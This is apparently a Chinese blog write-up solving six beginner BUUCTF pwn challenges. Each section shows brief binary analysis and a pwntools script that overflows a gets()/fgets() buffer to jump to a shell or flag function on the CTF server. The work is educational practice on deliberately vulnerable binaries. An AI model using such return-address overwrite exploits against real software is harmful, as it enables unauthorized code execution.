buuctf pwn(1)


阅读数: 次   
字数统计: 773字   |   阅读时长: 3分

1.test_your_nc
2.pwn1
3.warmup_csaw_2016
4.pwn1_sctf_2016
5.ciscn_2019_n_1
6.level0

@TOC

1.test_your_nc

先用exeinfo查壳,是64位的程序
在这里插入图片描述

用64位ida静态分析一下,找到main函数
在这里插入图片描述
F5反汇编,看到system(“/bin/sh”)
system()的作用———执行shell命令也就是向dos发送一条指令。
即执行/bin/sh命令,获得shell权限
在这里插入图片描述
在这里插入图片描述
用虚拟机连node3.buuoj.cn:27191
nc node3.buuoj.cn 27191
查看文件目录
ls
查看flag中的内容
cat flag
在这里插入图片描述

2.pwn1

查壳,64位程序
在这里插入图片描述
用虚拟机看一下有什么保护
在这里插入图片描述

64位ida静态分析,看一看main函数以及有特殊含义的函数
发现main函数中有gets()函数,所以有栈溢出漏洞
gets()函数可以输入无限长度的字符,所以容易超出系统分配的栈的最大长度。而在调用函数时栈中存有调用函数之后的命令的地址,所以只要将原本应该返回的地址覆盖掉,就能让程序进入fun函数,从而得到权限。
在这里插入图片描述
发现fun函数可以获得shell权限,那么只要让程序执行fun函数即可
在这里插入图片描述
进入到gets函数的s中
在这里插入图片描述
我们要将阴影部分填充入垃圾数据,在发送fun所在地址到r即可
在这里插入图片描述
脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/usr/bin/env python3

from pwn import*

context(os="linux",arch="amd64",log_level="debug")

#zdb=process("./pwn1")
zdb=remote("node3.buuoj.cn",29798)

payload=b'a'*(0x0f-0x00+8)+p64(0x040118a)

#zdb.sendlineafter("please input",payload)这种写法能打通本地,但打不通远程,不懂为啥
zdb.sendline(payload)
zdb.interactive()

3.warmup_csaw_2016

file
checksec
在这里插入图片描述
ida64
有gets函数栈溢出漏洞
在这里插入图片描述
进入sub_40060D中发现
在这里插入图片描述
运行一下程序
程序直接把system地址打印出来了,直接用就可以
在这里插入图片描述
脚本

1
2
3
4
5
6
7
8
9
10
11
#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="amd64",log_level="debug")

zdb=remote("node3.buuoj.cn",29734)

payload=b'a'*(0x40+8)+p64(0x40060d)

zdb.recvuntil(">")
zdb.sendline(payload)
zdb.interactive()

4.pwn1_sctf_2016

file checksec,32位,没有栈溢出保护
在这里插入图片描述
ida32
找到得到flag的地方
在这里插入图片描述
在这里插入图片描述
fgets 输入32位以内的字符串,点进去s,发现32位无法溢出。往下看,有you,I,replace函数猜测是将I替换为you,导致溢出
在这里插入图片描述
脚本

1
2
3
4
5
6
7
8
9
10
#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="i386",log_level="debug")

zdb=remote("node3.buuoj.cn",29353)

payload=b'I'*20+b'a'*4+p32(0x8048F0D)

zdb.sendline(payload)
zdb.interactive()

5.ciscn_2019_n_1

file checksec
在这里插入图片描述
ida64 进入main函数中的func函数,有gets()即栈溢出漏洞,还给了system(cat flag)
在这里插入图片描述
所以只需要溢出,然后返回到system(cat flag)处地址即可
在这里插入图片描述

脚本

1
2
3
4
5
6
7
8
#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="amd64",log_level="debug")
zdb=remote("node3.buuoj.cn",26842)
payload=b'a'*(0x30+8)+p64(0x004006BE)
zdb.recvuntil("Let's guess the number.\n")
zdb.sendline(payload)
zdb.interactive()

6.level0

file checksec
在这里插入图片描述
ida64
注意vuln()或者vulnerable()函数一般是ida认为有漏洞的函数
vulnerable:易受攻击的
在这里插入图片描述

在这里插入图片描述
可以栈溢出
callsystem函数可以得到shell
在这里插入图片描述
脚本

1
2
3
4
5
6
7
#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="amd64",log_level="debug")
zdb=remote("node3.buuoj.cn",27190)
payload=b'a'*(0x80-0x00+8)+p64(0x40059A)
zdb.sendlineafter("Hello, World\n",payload)
zdb.interactive()


-------------本文结束感谢您的阅读-------------



谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 本站访客数人次

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

朱登榜,来自河南郑州,河南大学学生,倘若文章有错误,望提醒修正,感谢!<br>qq:879322660<br>微信:z15981855791